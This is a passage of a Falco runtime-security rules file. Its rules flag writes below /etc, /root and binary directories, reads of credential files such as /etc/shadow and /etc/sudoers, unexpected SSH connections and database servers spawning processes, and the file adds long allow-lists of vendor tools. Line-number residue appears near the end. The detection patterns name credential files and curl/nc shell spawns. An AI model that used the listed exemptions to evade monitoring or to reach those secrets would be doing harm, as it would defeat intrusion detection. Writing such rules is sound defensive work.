- list: mail_config_binaries
  items: [
    update_conf, parse_mc, makemap_hash, newaliases, update_mk, update_tlsm4,
    update_db, update_mc, ssmtp.postinst, mailq, postalias, postfix.config.,
    postfix.config, postfix-script
    ]

- list: sensitive_file_names
  items: [/etc/shadow, /etc/sudoers, /etc/pam.conf]

- macro: sensitive_files
  condition: >
    fd.name startswith /etc and
    (fd.name in (sensitive_file_names)
     or fd.directory in (/etc/sudoers.d, /etc/pam.d))

# Indicates that the process is new. Currently detected using time
# since process was started, using a threshold of 5 seconds.
- macro: proc_is_new
  condition: proc.duration <= 5000000000

# Network
- macro: inbound
  condition: ((evt.type=listen and evt.dir=>) or (evt.type=accept and evt.dir=<))

# Currently sendto is an ignored syscall, otherwise this could also
# check for (evt.type=sendto and evt.dir=>)
- macro: outbound
  condition: evt.type=connect and evt.dir=< and (fd.typechar=4 or fd.typechar=6)

- macro: ssh_port
  condition: fd.sport=22

# In a local/user rules file, you could override this macro to
# enumerate the servers for which ssh connections are allowed. For
# example, you might have an ssh gateway host for which ssh connections
# are allowed.
#
# In the main falco rules file, there isn't any way to know the
# specific hosts for which ssh access is allowed, so this macro just
# repeats ssh_port, which effectively allows ssh from all hosts. In
# the overridden macro, the condition would look something like
# "fd.sip="a.b.c.d" or fd.sip="e.f.g.h" or ..."
- macro: allowed_ssh_hosts
  condition: ssh_port

- rule: Disallowed SSH Connection
  desc: Detect any new ssh connection to a host other than those in an allowed group of hosts
  condition: (outbound or inbound) and ssh_port and not allowed_ssh_hosts
  output: Disallowed SSH Connection (command=%proc.cmdline connection=%fd.name user=%user.name)
  priority: NOTICE
  tags: [network]

# Use this to test whether the event occurred within a container.

# When displaying container information in the output field, use
# %container.info, without any leading term (file=%fd.name
# %container.info user=%user.name, and not file=%fd.name
# container=%container.info user=%user.name). The output will change
# based on the context and whether or not -pk/-pm/-pc was specified on
# the command line.
- macro: container
  condition: container.id != host

- macro: interactive
  condition: >
    ((proc.aname=sshd and proc.name != sshd) or
    proc.name=systemd-logind or proc.name=login)

- list: cron_binaries
  items: [anacron, cron, crond, crontab]

# https://github.com/liske/needrestart
- list: needrestart_binaries
  items: [needrestart, 10-dpkg, 20-rpm, 30-pacman]

# Possible scripts run by sshkit
- list: sshkit_script_binaries
  items: [10_etc_sudoers., 10_passwd_group]

- list: plesk_binaries
  items: [sw-engine, sw-engine-fpm, sw-engine-kv, filemng, f2bmng]

# System users that should never log into a system. Consider adding your own
# service users (e.g. 'apache' or 'mysqld') here.
- macro: system_users
  condition: user.name in (bin, daemon, games, lp, mail, nobody, sshd, sync, uucp, www-data)

# These macros will be removed soon. Only keeping them to maintain
# compatibility with some widely used rules files.
# Begin Deprecated
- macro: parent_ansible_running_python
  condition: (proc.pname in (python, pypy) and proc.pcmdline contains ansible)

- macro: parent_bro_running_python
  condition: (proc.pname=python and proc.cmdline contains /usr/share/broctl)

- macro: parent_python_running_denyhosts
  condition: >
    (proc.cmdline startswith "denyhosts.py /usr/bin/denyhosts.py" or
    (proc.pname=python and
    (proc.pcmdline contains /usr/sbin/denyhosts or
    proc.pcmdline contains /usr/local/bin/denyhosts.py)))

- macro: parent_python_running_sdchecks
  condition: >
    (proc.pname in (python, python2.7) and
    (proc.pcmdline contains /opt/draios/bin/sdchecks))

- macro: parent_linux_image_upgrade_script
  condition: proc.pname startswith linux-image-

- macro: parent_java_running_echo
  condition: (proc.pname=java and proc.cmdline startswith "sh -c echo")

- macro: parent_scripting_running_builds
  condition: >
    (proc.pname in (php,php5-fpm,php-fpm7.1,python,ruby,ruby2.3,ruby2.1,node,conda) and (
    proc.cmdline startswith "sh -c git" or
    proc.cmdline startswith "sh -c date" or
    proc.cmdline startswith "sh -c /usr/bin/g++" or
    proc.cmdline startswith "sh -c /usr/bin/gcc" or
    proc.cmdline startswith "sh -c gcc" or
    proc.cmdline startswith "sh -c if type gcc" or
    proc.cmdline startswith "sh -c cd '/var/www/edi/';LC_ALL=en_US.UTF-8 git" or
    proc.cmdline startswith "sh -c /var/www/edi/bin/sftp.sh" or
    proc.cmdline startswith "sh -c /usr/src/app/crxlsx/bin/linux/crxlsx" or
    proc.cmdline startswith "sh -c make parent" or
    proc.cmdline startswith "node /jenkins/tools" or
    proc.cmdline startswith "sh -c '/usr/bin/node'" or
    proc.cmdline startswith "sh -c stty -a |" or
    proc.pcmdline startswith "node /opt/nodejs/bin/yarn" or
    proc.pcmdline startswith "node /usr/local/bin/yarn" or
    proc.pcmdline startswith "node /root/.config/yarn" or
    proc.pcmdline startswith "node /opt/yarn/bin/yarn.js"))

- macro: parent_Xvfb_running_xkbcomp
  condition: (proc.pname=Xvfb and proc.cmdline startswith 'sh -c "/usr/bin/xkbcomp"')

- macro: parent_nginx_running_serf
  condition: (proc.pname=nginx and proc.cmdline startswith "sh -c serf")

- macro: parent_node_running_npm
  condition: (proc.pcmdline startswith "node /usr/local/bin/npm" or
    proc.pcmdline startswith "node /usr/local/nodejs/bin/npm" or
    proc.pcmdline startswith "node /opt/rh/rh-nodejs6/root/usr/bin/npm")

- macro: parent_java_running_sbt
  condition: (proc.pname=java and proc.pcmdline contains sbt-launch.jar)

- list: known_container_shell_spawn_cmdlines
  items: []

- list: known_shell_spawn_binaries
  items: []

- macro: shell_spawning_containers
  condition: (container.image startswith jenkins or
    container.image startswith gitlab/gitlab-ce or
    container.image startswith gitlab/gitlab-ee)

# End Deprecated

- macro: ansible_running_python
  condition: (proc.name in (python, pypy) and proc.cmdline contains ansible)

- macro: chef_running_yum_dump
  condition: (proc.name=python and proc.cmdline contains yum-dump.py)

- macro: python_running_denyhosts
  condition: >
    (proc.name=python and
    (proc.cmdline contains /usr/sbin/denyhosts or
    proc.cmdline contains /usr/local/bin/denyhosts.py))

# Qualys seems to run a variety of shell subprocesses, at various
# levels. This checks at a few levels without the cost of a full
# proc.aname, which traverses the full parent hierarchy.
- macro: run_by_qualys
  condition: >
    (proc.pname=qualys-cloud-ag or
    proc.aname[2]=qualys-cloud-ag or
    proc.aname[3]=qualys-cloud-ag or
    proc.aname[4]=qualys-cloud-ag)

- macro: run_by_sumologic_securefiles
  condition: >
    ((proc.cmdline="usermod -a -G sumologic_collector" or
    proc.cmdline="groupadd sumologic_collector") and
    (proc.pname=secureFiles.sh and proc.aname[2]=java))

- macro: run_by_yum
  condition: ((proc.pname=sh and proc.aname[2]=yum) or
    (proc.aname[2]=sh and proc.aname[3]=yum))

- macro: run_by_ms_oms
  condition: >
    (proc.aname[3] startswith omsagent- or
    proc.aname[3] startswith scx-)

- macro: run_by_google_accounts_daemon
  condition: >
    (proc.aname[1] startswith google_accounts or
    proc.aname[2] startswith google_accounts)

# Chef is similar.
- macro: run_by_chef
  condition: (proc.aname[2]=chef_command_wr or proc.aname[3]=chef_command_wr or
    proc.aname[2]=chef-client or proc.aname[3]=chef-client or
    proc.name=chef-client)

- macro: run_by_adclient
  condition: (proc.aname[2]=adclient or proc.aname[3]=adclient or proc.aname[4]=adclient)

- macro: run_by_centrify
  condition: (proc.aname[2]=centrify or proc.aname[3]=centrify or proc.aname[4]=centrify)

- macro: run_by_puppet
  condition: (proc.aname[2]=puppet or proc.aname[3]=puppet)

# Also handles running semi-indirectly via scl
- macro: run_by_foreman
  condition: >
    (user.name=foreman and
    (proc.pname in (rake, ruby, scl) and proc.aname[5] in (tfm-rake,tfm-ruby)) or
    (proc.pname=scl and proc.aname[2] in (tfm-rake,tfm-ruby)))

- macro: java_running_sdjagent
  condition: proc.name=java and proc.cmdline contains sdjagent.jar

- macro: kubelet_running_loopback
  condition: (proc.pname=kubelet and proc.name=loopback)

- macro: python_mesos_marathon_scripting
  condition: (proc.pcmdline startswith "python3 /marathon-lb/marathon_lb.py")

- macro: splunk_running_forwarder
  condition: (proc.pname=splunkd and proc.cmdline startswith "sh -c /opt/splunkforwarder")

- macro: parent_supervise_running_multilog
  condition: (proc.name=multilog and proc.pname=supervise)

- macro: supervise_writing_status
  condition: (proc.name in (supervise,svc) and fd.name startswith "/etc/sb/")

- macro: pki_realm_writing_realms
  condition: (proc.cmdline startswith "bash /usr/local/lib/pki/pki-realm" and fd.name startswith /etc/pki/realms)

- macro: htpasswd_writing_passwd
  condition: (proc.name=htpasswd and fd.name=/etc/nginx/.htpasswd)

- macro: lvprogs_writing_lvm_archive
  condition: (proc.name in (dmeventd,lvcreate) and (fd.name startswith /etc/lvm/archive or
    fd.name startswith /etc/lvm/backup))

- macro: ovsdb_writing_openvswitch
  condition: (proc.name=ovsdb-server and fd.directory=/etc/openvswitch)

- macro: perl_running_plesk
  condition: (proc.cmdline startswith "perl /opt/psa/admin/bin/plesk_agent_manager" or
    proc.pcmdline startswith "perl /opt/psa/admin/bin/plesk_agent_manager")

- macro: perl_running_updmap
  condition: (proc.cmdline startswith "perl /usr/bin/updmap")

- macro: perl_running_centrifydc
  condition: (proc.cmdline startswith "perl /usr/share/centrifydc")

- macro: parent_ucf_writing_conf
  condition: (proc.pname=ucf and proc.aname[2]=frontend)

- macro: consul_template_writing_conf
  condition: >
    ((proc.name=consul-template and fd.name startswith /etc/haproxy) or
    (proc.name=reload.sh and proc.aname[2]=consul-template and fd.name startswith /etc/ssl))

- macro: countly_writing_nginx_conf
  condition: (proc.cmdline startswith "nodejs /opt/countly/bin" and
    fd.name startswith /etc/nginx)

- macro: ms_oms_writing_conf
  condition: >
    ((proc.name in (omiagent,omsagent,in_heartbeat_r*,omsadmin.sh,PerformInventor)
    or proc.pname in (omi.postinst,omsconfig.posti,scx.postinst,omsadmin.sh,omiagent))
    and (fd.name startswith /etc/opt/omi or fd.name startswith /etc/opt/microsoft/omsagent))

- macro: ms_scx_writing_conf
  condition: (proc.name in (GetLinuxOS.sh) and fd.name startswith /etc/opt/microsoft/scx)

- macro: azure_scripts_writing_conf
  condition: (proc.pname startswith "bash /var/lib/waagent/" and fd.name startswith /etc/azure)

- macro: azure_networkwatcher_writing_conf
  condition: (proc.name in (NetworkWatcherA) and fd.name=/etc/init.d/AzureNetworkWatcherAgent)

- macro: couchdb_writing_conf
  condition: (proc.name=beam.smp and proc.cmdline contains couchdb and fd.name startswith /etc/couchdb)

- macro: update_texmf_writing_conf
  condition: (proc.name=update-texmf and fd.name startswith /etc/texmf)

- macro: slapadd_writing_conf
  condition: (proc.name=slapadd and fd.name startswith /etc/ldap)

- macro: symantec_writing_conf
  condition: >
    ((proc.name=symcfgd and fd.name startswith /etc/symantec) or
    (proc.name=navdefutil and fd.name=/etc/symc-defutils.conf))

- macro: liveupdate_writing_conf
  condition: (proc.cmdline startswith "java LiveUpdate" and fd.name in (/etc/liveupdate.conf, /etc/Product.Catalog.JavaLiveUpdate))

- macro: sosreport_writing_files
  condition: >
    (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and
    (fd.name startswith /etc/pkt/nssdb or fd.name startswith /etc/pki/nssdb))

- macro: selinux_writing_conf
  condition: (proc.name in (semodule,genhomedircon,sefcontext_comp) and fd.name startswith /etc/selinux)

- list: veritas_binaries
  items: [vxconfigd, sfcache,
    vxclustadm, vxdctl, vxprint, vxdmpadm, vxdisk, vxdg, vxassist, vxtune]

- macro: veritas_driver_script
  condition: (proc.cmdline startswith "perl /opt/VRTSsfmh/bin/mh_driver.pl")

- macro: veritas_progs
  condition: (proc.name in (veritas_binaries) or veritas_driver_script)

- macro: veritas_writing_config
  condition: (veritas_progs and fd.name startswith /etc/vx)

- macro: nginx_writing_conf
  condition: (proc.name=nginx and fd.name startswith /etc/nginx)

- macro: nginx_writing_certs
  condition: >
    (((proc.name=openssl and proc.pname=nginx-launch.sh) or proc.name=nginx-launch.sh) and fd.name startswith /etc/nginx/certs)

- macro: chef_client_writing_conf
  condition: (proc.pcmdline startswith "chef-client /opt/gitlab" and fd.name startswith /etc/gitlab)

- macro: centrify_writing_krb
  condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)

- macro: cockpit_writing_conf
  condition: >
    ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
    and fd.name startswith /etc/cockpit)

- macro: ipsec_writing_conf
  condition: (proc.name=start-ipsec.sh and fd.directory=/etc/ipsec)

- macro: exe_running_docker_save
  condition: (proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker))

- macro: python_running_get_pip
  condition: (proc.cmdline startswith "python get-pip.py")

- macro: python_running_ms_oms
  condition: (proc.cmdline startswith "python /var/lib/waagent/")

- macro: gugent_writing_guestagent_log
  condition: (proc.name=gugent and fd.name=GuestAgent.log)

- rule: Write below binary dir
  desc: an attempt to write to any file below a set of binary directories
  condition: >
    bin_dir and evt.dir = < and open_write
    and not package_mgmt_procs
    and not
    exe_running_docker_save
    and not python_running_get_pip
    and not python_running_ms_oms
  output: >
    File below a known binary directory opened for writing (user=%user.name
    command=%proc.cmdline file=%fd.name parent=%proc.pname pcmdline=%proc.pcmdline gparent=%proc.aname[2])
  priority: ERROR
  tags: [filesystem]

- list: safe_etc_dirs
  items: [/etc/cassandra, /etc/ssl/certs/java, /etc/logstash, /etc/nginx/conf.d, /etc/container_environment, /etc/hrmconfig]

- macro: fluentd_writing_conf_files
  condition: (proc.name=start-fluentd and fd.name in (/etc/fluent/fluent.conf, /etc/td-agent/td-agent.conf))

- macro: qualys_writing_conf_files
  condition: (proc.name=qualys-cloud-ag and fd.name=/etc/qualys/cloud-agent/qagent-log.conf)

- macro: git_writing_nssdb
  condition: (proc.name=git-remote-http and fd.directory=/etc/pki/nssdb)

- macro: plesk_writing_keys
  condition: (proc.name in (plesk_binaries) and fd.name startswith /etc/sw/keys)

- macro: plesk_install_writing_apache_conf
  condition: (proc.cmdline startswith "bash -hB /usr/lib/plesk-9.0/services/webserver.apache configure"
    and fd.name="/etc/apache2/apache2.conf.tmp")

- macro: plesk_running_mktemp
  condition: (proc.name=mktemp and proc.aname[3] in (plesk_binaries))

- macro: networkmanager_writing_resolv_conf
  condition: proc.aname[2]=nm-dispatcher and fd.name=/etc/resolv.conf

- macro: add_shell_writing_shells_tmp
  condition: (proc.name=add-shell and fd.name=/etc/shells.tmp)

- macro: duply_writing_exclude_files
  condition: (proc.name=touch and proc.pcmdline startswith "bash /usr/bin/duply" and fd.name startswith "/etc/duply")

- macro: xmlcatalog_writing_files
  condition: (proc.name=update-xmlcatal and fd.directory=/etc/xml)

- macro: datadog_writing_conf
  condition: ((proc.cmdline
    startswith "python /opt/datadog-agent" or
    proc.cmdline startswith "entrypoint.sh /entrypoint.sh datadog start" or
    proc.cmdline startswith "agent.py /opt/datadog-agent")
    and fd.name startswith "/etc/dd-agent")

- macro: curl_writing_pki_db
  condition: (proc.name=curl and fd.directory=/etc/pki/nssdb)

- macro: haproxy_writing_conf
  condition: ((proc.name in (update-haproxy-,haproxy_reload.) or proc.pname in (update-haproxy-,haproxy_reload,haproxy_reload.))
    and (fd.name=/etc/openvpn/client.map or fd.name startswith /etc/haproxy))

- macro: java_writing_conf
  condition: (proc.name=java and fd.name=/etc/.java/.systemPrefs/.system.lock)

- macro: rabbitmq_writing_conf
  condition: (proc.name=rabbitmq-server and fd.directory=/etc/rabbitmq)

- macro: rook_writing_conf
  condition: (proc.name=toolbox.sh and container.image startswith rook/toolbox
    and fd.directory=/etc/ceph)

- macro: httpd_writing_conf_logs
  condition: (proc.name=httpd and fd.name startswith /etc/httpd/)

- macro: mysql_writing_conf
  condition: ((proc.name=start-mysql.sh or proc.pname=start-mysql.sh) and fd.name startswith /etc/mysql)

- macro: openvpn_writing_conf
  condition: (proc.name in (openvpn,openvpn-entrypo) and fd.name startswith /etc/openvpn)

- macro: php_handlers_writing_conf
  condition: (proc.name=php_handlers_co and fd.name=/etc/psa/php_versions.json)

- macro: sed_writing_temp_file
  condition: >
    ((proc.aname[3]=cron_start.sh and fd.name startswith /etc/security/sed) or
    (proc.name=sed and (fd.name startswith /etc/apt/sources.list.d/sed or
    fd.name startswith /etc/apt/sed or
    fd.name startswith /etc/apt/apt.conf.d/sed)))

- macro: cron_start_writing_pam_env
  condition: (proc.cmdline="bash /usr/sbin/start-cron" and fd.name=/etc/security/pam_env.conf)

# In some
# cases dpkg-reconfigur runs commands that modify /etc. Not
# putting the full set of package management programs yet.
- macro: dpkg_scripting
  condition: (proc.aname[2] in (dpkg-reconfigur, dpkg-preconfigu))

# Add conditions to this macro (probably in a separate file,
# overwriting this macro) to allow for specific combinations of
# programs writing below specific directories below
# /etc. fluentd_writing_conf_files is a good example to follow, as it
# specifies both the program doing the writing as well as the specific
# files it is allowed to modify.
#
# In this file, it just takes one of the programs in the base macro
# and repeats it.

- macro: user_known_write_etc_conditions
  condition: proc.name=confd

- macro: write_etc_common
  condition: >
    etc_dir and evt.dir = < and open_write
    and proc_name_exists
    and not proc.name in (passwd_binaries, shadowutils_binaries, sysdigcloud_binaries,
                          package_mgmt_binaries, ssl_mgmt_binaries, dhcp_binaries,
                          dev_creation_binaries, shell_mgmt_binaries,
                          mail_config_binaries,
                          sshkit_script_binaries,
                          ldconfig.real, ldconfig, confd, gpg, insserv,
                          apparmor_parser, update-mime, tzdata.config, tzdata.postinst,
                          systemd, systemd-machine, systemd-sysuser,
                          debconf-show, rollerd, bind9.postinst, sv,
                          gen_resolvconf., update-ca-certi, certbot, runsv,
                          qualys-cloud-ag, locales.postins, nomachine_binaries,
                          adclient, certutil, crlutil, pam-auth-update, parallels_insta,
                          openshift-launc, update-rc.d)
    and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries, dhcp_binaries)
    and not fd.name pmatch (safe_etc_dirs)
    and not fd.name in (/etc/container_environment.sh, /etc/container_environment.json, /etc/motd, /etc/motd.svc)
    and not exe_running_docker_save
    and not ansible_running_python
    and not python_running_denyhosts
    and not fluentd_writing_conf_files
    and not user_known_write_etc_conditions
    and not run_by_centrify
    and not run_by_adclient
    and not qualys_writing_conf_files
    and not git_writing_nssdb
    and not plesk_writing_keys
    and not plesk_install_writing_apache_conf
    and not plesk_running_mktemp
    and not networkmanager_writing_resolv_conf
    and not run_by_chef
    and not add_shell_writing_shells_tmp
    and not duply_writing_exclude_files
    and not xmlcatalog_writing_files
    and not parent_supervise_running_multilog
    and not supervise_writing_status
    and not pki_realm_writing_realms
    and not htpasswd_writing_passwd
    and not lvprogs_writing_lvm_archive
    and not ovsdb_writing_openvswitch
    and not datadog_writing_conf
    and not curl_writing_pki_db
    and not haproxy_writing_conf
    and not java_writing_conf
    and not dpkg_scripting
    and not parent_ucf_writing_conf
    and not rabbitmq_writing_conf
    and not rook_writing_conf
    and not php_handlers_writing_conf
    and not sed_writing_temp_file
    and not cron_start_writing_pam_env
    and not httpd_writing_conf_logs
    and not mysql_writing_conf
    and not openvpn_writing_conf
    and not consul_template_writing_conf
    and not countly_writing_nginx_conf
    and not ms_oms_writing_conf
    and not ms_scx_writing_conf
    and not azure_scripts_writing_conf
    and not azure_networkwatcher_writing_conf
    and not couchdb_writing_conf
    and not update_texmf_writing_conf
    and not slapadd_writing_conf
    and not symantec_writing_conf
    and not liveupdate_writing_conf
    and not sosreport_writing_files
    and not selinux_writing_conf
    and not veritas_writing_config
    and not nginx_writing_conf
    and not nginx_writing_certs
    and not chef_client_writing_conf
    and
    not centrify_writing_krb
    and not cockpit_writing_conf
    and not ipsec_writing_conf

- rule: Write below etc
  desc: an attempt to write to any file below /etc
  condition: write_etc_common
  output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name program=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])"
  priority: ERROR
  tags: [filesystem]

- list: known_root_files
  items: [/root/.monit.state, /root/.auth_tokens, /root/.bash_history, /root/.ash_history, /root/.aws/credentials,
    /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack,
    /root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd]

- list: known_root_directories
  items: [/root/.oracle_jre_usage, /root/.ssh, /root/.subversion, /root/.nami]

- macro: known_root_conditions
  condition: (fd.name startswith /root/orcexec.
    or fd.name startswith /root/.m2
    or fd.name startswith /root/.npm
    or fd.name startswith /root/.pki
    or fd.name startswith /root/.ivy2
    or fd.name startswith /root/.config/Cypress
    or fd.name startswith /root/.config/pulse
    or fd.name startswith /root/.config/configstore
    or fd.name startswith /root/jenkins/workspace
    or fd.name startswith /root/.jenkins
    or fd.name startswith /root/.cache
    or fd.name startswith /root/.sbt
    or fd.name startswith /root/.java
    or fd.name startswith /root/.glide
    or fd.name startswith /root/.sonar
    or fd.name startswith /root/.v8flag
    or fd.name startswith /root/infaagent
    or fd.name startswith /root/.local/lib/python
    or fd.name startswith /root/.pm2
    or fd.name startswith /root/.gnupg
    or fd.name startswith /root/.pgpass
    or fd.name startswith /root/.theano
    or fd.name startswith /root/.gradle
    or fd.name startswith /root/.android
    or fd.name startswith /root/.ansible
    or fd.name startswith /root/.crashlytics
    or fd.name startswith /root/.dbus
    or fd.name startswith /root/.composer
    or fd.name startswith /root/.gconf
    or fd.name startswith /root/.nv)

- rule: Write below root
  desc: an attempt to write to any file directly below / or /root
  condition: >
    root_dir and evt.dir = < and open_write
    and not fd.name in (known_root_files)
    and not fd.directory in (known_root_directories)
    and not exe_running_docker_save
    and not gugent_writing_guestagent_log
    and not known_root_conditions
  output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name program=%proc.name)"
  priority: ERROR
  tags: [filesystem]

- macro: cmp_cp_by_passwd
  condition: proc.name in (cmp, cp) and proc.pname in (passwd, run-parts)

- rule: Read sensitive file trusted after startup
  desc: >
    an attempt to read any sensitive file (e.g. files containing user/password/authentication
    information) by a trusted program after startup. Trusted programs might read these files
    at startup to load initial state, but not afterwards.
  condition: sensitive_files and open_read and server_procs and not proc_is_new and proc.name!="sshd"
  output: >
    Sensitive file opened for reading by trusted program after startup (user=%user.name
    command=%proc.cmdline parent=%proc.pname file=%fd.name gparent=%proc.aname[2])
  priority: WARNING
  tags: [filesystem]

- list: read_sensitive_file_binaries
  items: [
    iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, sshd,
    vsftpd, systemd, mysql_install_d, psql, screen, debconf-show, sa-update,
    pam-auth-update, /usr/sbin/spamd, polkit-agent-he, lsattr, file, sosreport,
    scxcimservera, adclient, rtvscand, cockpit-session
    ]

# Add conditions to this macro (probably in a separate file,
# overwriting this macro) to allow for specific combinations of
# programs accessing sensitive files.
# fluentd_writing_conf_files is a good example to follow, as it
# specifies both the program doing the writing as well as the specific
# files it is allowed to modify.
#
# In this file, it just takes one of the macros in the base rule
# and repeats it.

- macro: user_read_sensitive_file_conditions
  condition: cmp_cp_by_passwd

- rule: Read sensitive file untrusted
  desc: >
    an attempt to read any sensitive file (e.g. files containing user/password/authentication
    information). Exceptions are made for known trusted programs.
  condition: >
    sensitive_files and open_read
    and proc_name_exists
    and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries,
    cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries,
    vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries,
    in.proftpd, mandb, salt-minion, postgres_mgmt_binaries)
    and not cmp_cp_by_passwd
    and not ansible_running_python
    and not proc.cmdline contains /usr/bin/mandb
    and not run_by_qualys
    and not run_by_chef
    and not user_read_sensitive_file_conditions
    and not perl_running_plesk
    and not perl_running_updmap
    and not veritas_driver_script
    and not perl_running_centrifydc
  output: >
    Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name
    command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])
  priority: WARNING
  tags: [filesystem]

# Only let rpm-related programs write to the rpm database
- rule: Write below rpm database
  desc: an attempt to write to the rpm database by any non-rpm related program
  condition: fd.name startswith /var/lib/rpm and open_write and not rpm_procs and not ansible_running_python and not chef_running_yum_dump
  output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name)"
  priority: ERROR
  tags: [filesystem, software_mgmt]

- macro: postgres_running_wal_e
  condition: (proc.pname=postgres and proc.cmdline startswith "sh -c envdir /etc/wal-e.d/env /usr/local/bin/wal-e")

- macro: redis_running_prepost_scripts
  condition: (proc.aname[2]=redis-server and (proc.cmdline contains "redis-server.post-up.d" or proc.cmdline contains "redis-server.pre-up.d"))

- macro: rabbitmq_running_scripts
  condition:
(proc.pname=beam.smp and (proc.cmdline startswith "sh -c exec ps" or proc.cmdline startswith "sh -c exec inet_gethost")) 915 | 916 | - macro: rabbitmqctl_running_scripts 917 | condition: (proc.aname[2]=rabbitmqctl and proc.cmdline startswith "sh -c ") 918 | 919 | - rule: DB program spawned process 920 | desc: > 921 | a database-server related program spawned a new process other than itself. 922 | This shouldn't occur and is a follow-on from some SQL injection attacks. 923 | condition: > 924 | proc.pname in (db_server_binaries) 925 | and spawned_process 926 | and not proc.name in (db_server_binaries) 927 | and not postgres_running_wal_e 928 | output: > 929 | Database-related program spawned process other than itself (user=%user.name 930 | program=%proc.cmdline parent=%proc.pname) 931 | priority: NOTICE 932 | tags: [process, database] 933 | 934 | - rule: Modify binary dirs 935 | desc: an attempt to modify any file below a set of binary directories. 936 | condition: (bin_dir_rename or bin_dir_resolved) and modify and not package_mgmt_procs and not exe_running_docker_save 937 | output: > 938 | File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline 939 | operation=%evt.type file=%fd.name %evt.args) 940 | priority: ERROR 941 | tags: [filesystem] 942 | 943 | - rule: Mkdir binary dirs 944 | desc: an attempt to create a directory below a set of binary directories. 945 | condition: mkdir and bin_dir_mkdir and not package_mgmt_procs 946 | output: > 947 | Directory below known binary directory created (user=%user.name 948 | command=%proc.cmdline directory=%evt.arg.path) 949 | priority: ERROR 950 | tags: [filesystem] 951 | 952 | # This list allows for easy additions to the set of commands allowed 953 | # to change thread namespace without having to copy and override the 954 | # entire change thread namespace rule. 
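# As an illustration only (the binary name below is a hypothetical
# placeholder, not part of this repository), an override placed in
# falco_rules.local.yaml that permits an extra program to call setns
# could look like:
#
# - list: user_known_change_thread_namespace_binaries
#   items: [my-container-tool]
#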
955 | - list: user_known_change_thread_namespace_binaries 956 | items: [] 957 | 958 | - rule: Change thread namespace 959 | desc: > 960 | an attempt to change a program/thread's namespace (commonly done 961 | as a part of creating a container) by calling setns. 962 | condition: > 963 | evt.type = setns 964 | and not proc.name in (docker_binaries, k8s_binaries, lxd_binaries, sysdigcloud_binaries, sysdig, nsenter) 965 | and not proc.name in (user_known_change_thread_namespace_binaries) 966 | and not proc.name startswith "runc:" 967 | and not proc.pname in (sysdigcloud_binaries) 968 | and not java_running_sdjagent 969 | and not kubelet_running_loopback 970 | output: > 971 | Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline 972 | parent=%proc.pname %container.info) 973 | priority: NOTICE 974 | tags: [process] 975 | 976 | # The binaries in this list and their descendants are *not* allowed to 977 | # spawn shells. This includes the binaries spawning shells directly as 978 | # well as indirectly. For example, apache -> php/perl for 979 | # mod_{php,perl} -> some shell is also not allowed, because the shell 980 | # has apache as an ancestor. 
981 | 982 | - list: protected_shell_spawning_binaries 983 | items: [ 984 | http_server_binaries, db_server_binaries, nosql_server_binaries, mail_binaries, 985 | fluentd, flanneld, splunkd, consul, smbd, runsv, PM2 986 | ] 987 | 988 | - macro: parent_java_running_zookeeper 989 | condition: (proc.pname=java and proc.pcmdline contains org.apache.zookeeper.server) 990 | 991 | - macro: parent_java_running_kafka 992 | condition: (proc.pname=java and proc.pcmdline contains kafka.Kafka) 993 | 994 | - macro: parent_java_running_elasticsearch 995 | condition: (proc.pname=java and proc.pcmdline contains org.elasticsearch.bootstrap.Elasticsearch) 996 | 997 | - macro: parent_java_running_activemq 998 | condition: (proc.pname=java and proc.pcmdline contains activemq.jar) 999 | 1000 | - macro: parent_java_running_cassandra 1001 | condition: (proc.pname=java and (proc.pcmdline contains "-Dcassandra.config.loader" or proc.pcmdline contains org.apache.cassandra.service.CassandraDaemon)) 1002 | 1003 | - macro: parent_java_running_jboss_wildfly 1004 | condition: (proc.pname=java and proc.pcmdline contains org.jboss) 1005 | 1006 | - macro: parent_java_running_glassfish 1007 | condition: (proc.pname=java and proc.pcmdline contains com.sun.enterprise.glassfish) 1008 | 1009 | - macro: parent_java_running_hadoop 1010 | condition: (proc.pname=java and proc.pcmdline contains org.apache.hadoop) 1011 | 1012 | - macro: parent_java_running_datastax 1013 | condition: (proc.pname=java and proc.pcmdline contains com.datastax) 1014 | 1015 | - macro: nginx_starting_nginx 1016 | condition: (proc.pname=nginx and proc.cmdline contains "/usr/sbin/nginx -c /etc/nginx/nginx.conf") 1017 | 1018 | - macro: nginx_running_aws_s3_cp 1019 | condition: (proc.pname=nginx and proc.cmdline startswith "sh -c /usr/local/bin/aws s3 cp") 1020 | 1021 | - macro: consul_running_net_scripts 1022 | condition: (proc.pname=consul and (proc.cmdline startswith "sh -c curl" or proc.cmdline startswith "sh -c nc")) 1023 | 1024 | - 
